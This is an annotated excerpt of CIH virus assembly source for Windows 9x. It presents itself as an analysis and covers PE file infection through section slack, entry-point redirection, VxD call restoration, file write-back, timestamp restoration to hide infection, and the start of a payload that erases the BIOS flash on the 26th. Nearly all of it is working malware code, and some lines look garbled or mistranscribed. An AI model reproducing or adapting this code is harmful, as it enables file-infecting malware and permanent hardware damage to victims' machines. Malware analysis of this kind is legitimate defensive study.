Virus source code analysis: anatomy of the CIH virus, part 4 (infection tail, VxD-call restoration, file write-back and the BIOS-flash payload). The code is Windows 9x ring-0 VxD code: file I/O goes through IFSMgr_Ring0_FileIO via the `int 20h` VxD-call mechanism, and the listing below is a fragment that begins and ends mid-routine.

push EAX; block table size
push edx; edx is the offset of the Virus code block table
push esi; buffer address
  
; The virus code plus its section table must fit in the file's existing unused space (the header slack computed below); if they do not fit, only the infected mark is set and nothing is written.
Inc ECX
push ecx; Save numberofsections+1
  
SHL ecx, 03h; multiply 8
push ecx; reserved virus block table space
  
Add ecx, eax
add ecx, edx; offset of the body of the ecx+ file
  
Sub ecx, (sizeofheaders-@9) [esi]
Not ECX
Inc ECX; ecx for file header size-offset of BODY = unused space
  
Push ECX
  
Xchg ecx, eax; ecx to block table size
  
mov eax, (Addressofentrypoint-@9][esi]; entry RVA address
add eax, (imagebase-@9) [esi]; Mount Base Address
MOV (ORIGINALADDRESSOFENTRYPOINT-@9) [esi], eax; Save the actual entry address after loading
  
; Compare the unused space (top of stack) with the size of the first (merged) virus code section; if it is smaller, only set the infected mark.
CMP word ptr [ESP], small codesizeofmergeviruscodesection
JL Onlysetinfectedmark
  
; Read all virus block tables
mov eax, EBP; Read the function number
Call EDI; Read Block list to ESI (@9)
  
; Special case: WinZip self-extracting archives are skipped, because infecting them breaks the extractor and the damage is noticed as soon as the user opens the file.
; The virus takes PointerToRawData of the second section table entry, reads 4 bytes of that section's data,
; and checks them for the "WinZip (R)" marker.
  
Xchg eax, EBP
Push 00000004h
Pop ecx read 4 bytes
  
Push edx
mov edx, (SIZEOFSCETIONTABLE+POINTERTORAWDATA-@9][EBX]
; edx is the offset of the second block (. rdata)
  
Add edx, 12h, plus 10h+2h (10h for "WinZip ....")
  
Call edi; Read 4 bytes to ESI
  
; If the 4 bytes match the WinZip signature, this is a WinZip self-extractor: leave the file untouched and do not even set the infected mark.
CMP dword ptr [esi], ' pizn '
Je notsetinfectedmark
  
Pop edx; edx points to block table in file first address
  
; Set up a virus code block table
Pop ebx; unused space size
Pop edi; EDI = TOTALSIZEOFVIRUSCODESECTIONTABL
Pop ecx; ECX = numberofsections+1
  
Push EDI
add edx, EBP; EBP to block table size
push edx; file pointer
  
Add Ebp, ESI; Ebp points to the block table of the virus data area (first block)
Push EBP; Buffer address
  
; Set the size of the first virus code block
Lea EAX, [ebp+edi-04h]
mov [EAX], ebx
  
; Set the first block of viruses
Push ebx; The size of the first block of the virus code
  
Add edx, EDI
push edx; file pointer
Lea EDI, (myvirusstart-@9) [esi]
Push EDI; buffer address
  
; Redirect AddressOfEntryPoint to the virus body: the new entry RVA is saved here and written to the file later together with the other queued items.
MOV (NEWADDRESSOFENTRYPOINT-@9) [esi], edx; Save a new program entry (virus text)
  
; Set Initial data
Lea edx, [esi-sizeofscetiontable]; EdX first minus one block table length
mov ebp, offset virussize; ebp for virus length
  
JMP starttowritecodetosections
  
; Walk the host's section table: each section's slack (SizeOfRawData - VirtualSize) receives the next piece of virus code, and one virus section table entry is recorded per piece.
Loopofwritecodetosections:
Add edx, sizeofscetiontable
mov ebx, (sizeofrawdata-@9) [edx]; EBX is the sizeofrawdata (block size) for the block table entry
Sub ebx, (Virtualsize-@9][edx]; minus virtualsize equals the block unused space
Jbe endofwritecodetosections
  
Push ebx; Size
  
Sub eax, 08h
mov [EAX], ebx; writing a virus block table
  
mov ebx, (pointertorawdata-@9) [edx]; ebx Physical (actual) offset to block
Add ebx, (virtualsize-@9) [edx]; plus virtualsize
push ebx; ebx Pointer to the block's unused space
  
Push EDI; Buffer Address
  
mov ebx, (virtualsize-@9) [edx]
Add ebx, (virtualaddress-@9) [edx]
Add ebx, (imagebase-@9) [esi]; EBX the actual address after the block is loaded
mov [eax+4], ebx; saving to the virus block table
  
mov ebx, [eax]; The block has no space size
Add (virtualsize-@9) [edx], ebx; add to VirtualSize of the block table entry
  
; Mark the section as readable and as containing initialized data (IMAGE_SCN_MEM_READ | IMAGE_SCN_CNT_INITIALIZED_DATA = 40000040h), so the loader maps the slack now holding virus code.
or (CHARACTERISTICS-@9) [edx], 40000040h
  
; Start writing code
Starttowritecodetosections:
Sub EBP, ebx; virus size-Virus block size
  
; Set the virus block table Terminator if it is less than (the virus is inserted)
Jbe Setviruscodesectiontableendmark
  
Add EDI, EBX; point to the next piece of the virus
  
; End of writing code
Endofwritecodetosections:
Loop loopofwritecodetosections
  
Onlysetinfectedmark:
mov esp, DR1; Set infection flag only
  
JMP Writeviruscodetofile; Jump to a program that writes viruses to infected files
  
; Do not set the infection flag
Notsetinfectedmark:
Add ESP, 3ch
JMP closefile; go to CloseFile.
  
; Set the virus block table and tags
Setviruscodesectiontableendmark:
; Adjust the virus block code
Add [eax], EBP; Correct the last item in the Virus block table
Add [esp+08h], EBP
  
; Set block table End flag
XOR ebx, EBX
mov [eax-04h], ebx
  
; VxD calls are written as `int 20h` followed by a 32-bit service ID; the VMM patches each call site in place after its first use, so the in-memory image no longer matches the original bytes. Before the body is written to the file, every call site is walked backwards (using the stored deltas) and restored to its canonical `int 20h` + ID form.
Lea EAX, (lastvxdcalladdress-2-@9) [ESI]; The address of the previous call to the VXD directive
  
MOV cl, vxdcalltablesize; number of VxD calls used
  
Loopofrestorevxdcallid:
mov word ptr [eax], 20CDH; revert to "int 20h" form
  
; Remove the ID number of the VXD call from the vxdcallidtable to the edx
mov edx, (vxdcallidtable+ (ecx-1) *04h-@9) [esi]
  
mov [eax+2], edx; put in the back of "int 20h"
  
; The difference between the address of the command with each call to VxD is placed in the vxdcalladdresstable
Movzx edx, byte ptr (vxdcalladdresstable+ecx-1-@9) [esi]
  
Sub eax, edx; eax as Last Call address
  
loop loopofrestorevxdcallid; restore other calls
  
; Write the virus code to the file
Writeviruscodetofile:
mov eax, DR1;d R1 for the previously saved ESP
mov ebx, [eax+10h]; ebx save file handle for save in stack
mov edi, [eax]; EDI is the Ifsmgr_ring0_fileio call address saved in the stack
  
; Loop Write
Loopofwriteviruscodetofile:
Pop ecx; The offset of each segment of the virus code
Jecxz Setfilemodificationmark; Until the virus is offset by 0.
  
mov esi, ecx
mov eax, 0d601h; Write file function number (r0_writefile)
Pop edx; file pointer
Pop ecx; number of bytes to write
  
Call EDI; VXD calls Ifsmgr_ring0_fileio, writes files
; Each iteration pops one queued (buffer, file offset, length) triple and writes it: the pieces of virus code, the virus section table, the modified
; file section table, the new entry point and the infected mark. The loop ends when a zero buffer address is popped.
JMP Loopofwriteviruscodetofile
  
; Restore the file's original modification time after writing, so the change is not visible from the timestamp. Note that the code was placed in existing unused space rather than appended, so file size does not reveal the infection either; content hashing or section-slack inspection is the reliable signal.
Setfilemodificationmark:
Pop ebx
Pop eax
  
STC; setting a carry flag
PUSHF; sign-in stack
  
; Close File
CloseFile:
xor eax, EAX
mov ah, 0d7h; Turn off the file function number
Call EDI; VXD call Ifsmgr_ring0_fileio Close file
  
Popf
Pop esi
Jnc Iskillcomputer; If the carry flag is 0, turn to Killcomputer
  
; Restore file modification time
mov ebx, EDI
  
mov ax, 4303h
mov ecx, (filemodificationtime-@7) [esi]
mov edi, (filemodificationtime+2-@7) [esi]
Call ebx; VXD call Ifsmgr_ring0_fileio, modify the last modified time of the file
  
  
; Set not "Busy" flag
Disableonbusy:
Dec byte ptr (onbusy-@7) [esi]
  
; Call the original Filesystemapihook
Prevhook:
Popad; restore all registers
  
mov eax, dr0; Save the original file system hook program first address
JMP [eax]; jump to the original hook to execute
  
; Pifsfunc: tail of the virus's FileSystemApiHook for IFS requests it does not
; handle itself. It forwards the request to the previous hook (FSDFnAddr) and,
; for a file-open request, records the file's DOS date/time so the infection
; routine can restore the timestamp after writing (see "Restore file modification
; time" above). Entered with a pushad frame on the stack (the pushad is done at the
; hook entry, which is not in this excerpt) and esi = virus base for the
; (label-@6)[esi] addressing used throughout the virus.
Pifsfunc:
mov ebx, esp; ebx = frame base; the hook's arguments sit above the pushad frame (20h) and the return address (04h)
Push DWORD ptr [ebx+20h+04h+14h]; argument: pioreq (the I/O request packet); offsets assume pushad+ret layout -- confirm against the hook entry
call [ebx+20h+04h]; call the previous hook (FSDFnAddr) with that single argument
Pop ecx; discard the argument slot; ecx = pioreq pointer again

mov [ebx+1ch], eax; store the return value in the saved-EAX slot of the pushad frame, so popad hands it back to the caller

; Only open requests carry the timestamp the virus wants: 24h is presumably the
; IFS function number for open (IFSFN_OPEN) -- confirm against the IFSMgr definitions
CMP DWORD ptr [ebx+20h+04h+04h], 00000024h
Jne Quitmyvirusfilesystemhook


; Read the file's DOS-format modification date/time from the request packet (+28h, per the original analysis)
mov eax, [ecx+28h]
MOV (FILEMODIFICATIONTIME-@6) [esi], eax; saved for the timestamp restore after infection


; Leave the hook: restore all registers and return to the IFS manager
Quitmyvirusfilesystemhook:
Popad; pairs with the pushad done at hook entry (outside this excerpt)

ret; return to the caller of the virus's file-system hook
  
; Payload: overwrite the system BIOS flash ROM. Only the setup is shown; the listing breaks off below after the first command byte is written.
Iskillcomputer:
; Read the current day of the month from the RTC/CMOS (register 07h via index port 70h, data port 71h)
mov al, 07h
Out 70h, AL
In Al, 71h
  
Xor al, 26h; Judging if it's number 26th,
  
; In a DEBUG build the payload is always skipped; otherwise it runs only when the CMOS day (stored as BCD) is 26h, i.e. the 26th of the month. Any other day goes to Disableonbusy without harm.
IF DEBUG
JMP Disableonbusy
ELSE
JNZ disableonbusy; If it is not number 26th, turn to disableonbusy without breaking
ENDIF
  
; Start destroying BIOS EEPROM *
MOV bp, 0cf8h
Lea ESI, Ioforeeprom-@7[esi]
  
; Make the BIOS region 000E0000-000EFFFF (64 KB) writable by programming the chipset through PCI configuration space (address port 0CF8h, data port 0CFEh); the Ioforeeprom routine called via ESI is not shown in this excerpt
mov edi, 8000384ch
MOV dx, 0cfeh
Cli
Call ESI
  
; Same for the BIOS region 000F0000-000FFFFF (64 KB), with the data port decremented and the boolean-calculate code patched in place
mov di, 0058h
Dec edx; and A0FH
mov word ptr (booleancalculatecode-@10) [esi], 0f24h
Call ESI
  
; Additionally expose the 512 bytes at 000E0000-000E01FF of the BIOS ROM
; and enable writes to the BIOS flash block (Enableeepromtowrite, not shown in this excerpt)
Lea EBX, Enableeepromtowrite-@10[esi]
  
mov eax, 0e5555h
mov ecx, 0e2aaah
Call EBX
mov byte ptr [eax], 60h
